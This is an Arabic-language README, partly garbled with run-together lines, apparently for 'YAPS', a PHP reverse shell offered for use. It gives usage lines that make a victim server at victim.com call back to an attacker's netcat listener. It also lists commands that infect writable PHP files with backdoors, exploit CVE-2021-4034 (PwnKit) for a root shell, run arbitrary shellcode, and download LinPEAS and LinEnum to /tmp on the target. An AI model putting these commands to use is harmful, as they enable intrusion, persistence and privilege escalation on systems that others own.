
شل PHP عكسي آخر - الأكثر اكتمالاً بين شلات PHP العكسية

نعم، كما يكشف الاسم، هذه قشرة عكسية أخرى لـ PHP، واحدة أخرى من بين المئات المتاحة، ولكن مع بعض المزايا. إنها ملف PHP واحد يحتوي على جميع وظائفها ويمكنك التحكم بها عبر مستمع TCP بسيط (مثل nc -lp 1337).
في الإصدار الحالي (1.5)، تدعم وظائفه الرئيسية أنظمة لينكس فقط، لكنني أخطط لجعلها تعمل مع ويندوز أيضًا.
إنه حاليًا في إصداره الأول ولم أختبره كثيرًا بعد، ولا يزال هناك أشياء كثيرة أنوي القيام بها وتحسينها للإصدارات القادمة (لم يكتمل بعد!)، لذا أرجو إبلاغي إذا وجدت أي أخطاء أو لديك اقتراح لميزة أو تحسين. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php)؛yaps.php?s أو yaps.php?silent لإخفاء الشعارphp yaps.php ip port!help - عرض قائمة المساعدة!all-colors - تبديل جميع الألوان (متوافق مع TTY عديم اللون)!color - تبديل لون PS1 (محليًا فقط، لا يتم تغيير أي متغير بيئة)!duplicate - إنشاء اتصال YAPS آخر!enum - تنزيل LinPEAS و LinEnum إلى /tmp وتجهيزهما للاستخدام!info - سرد معلومات حول الهدف (الاستكشاف الذي ذكرته أعلاه)!infect - إصابة ملفات PHP القابلة للكتابة بأبواب خلفية!interactive - إنشاء شل عكسي تفاعلي على منافذ أخرى (يعمل مع sudo و su و mysql وغيرها)!passwd - خيار كلمة المرور (تمكين، تعطيل، تعيين، تعديل)!php - كتابة وتنفيذ PHP على الجهاز البعيد!pwnkit - محاولة استغلال CVE-2021-4034 وإنشاء شل جذر عكسي





الإصدار 1.5 - 12/02/2022
!shellcode لاستقبال وتنفيذ شيلكود عشوائيduplicate() (يمكنك الآن تحديد نطاق من المنافذ)stabilize إلى interactiveالإصدار 1.4 - 04/02/2022
!pwnkit لاستغلال CVE-2021-4034 وإنشاء شل جذر عكسيverify_update()الإصدار 1.3.1 - 01/08/2021
الإصدار 1.3 - 28/07/2021
!infect لإصابة ملفات PHP بأبواب خلفية!stabilize (إصلاح الأخطاء)الإصدار 1.2.2 - 18/07/2021
الإصدار 1.2.1 - 17/07/2021
الإصدار 1.2 - 17/07/2021
!duplicate لإنشاء شل آخر--update|-u)--help|-h)php yaps.php ip port)الإصدار 1.1 - 12/07/2021
!all-colors لتبديل ألوان الطرفية والعمل مع TTYs عديمة اللونexit لإغلاق المأخذ (مغادرة الشل)!stabilize لتعطيل HISTSIZE و HISTFILE!infoالإصدار 1.0.1 - 08/07/2021
[x,y,z] إلى array(x,y,z) لتحسين التوافق مع إصدارات PHP الأقدمبعض الأفكار مستوحاة من هذه الأدوات:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!shellcode - إرسال وتنفيذ شيلكود على الجهاز البعيد!suggester - تنزيل Linux Exploit Suggester إلى /tmp وتجهيزه للاستخدام

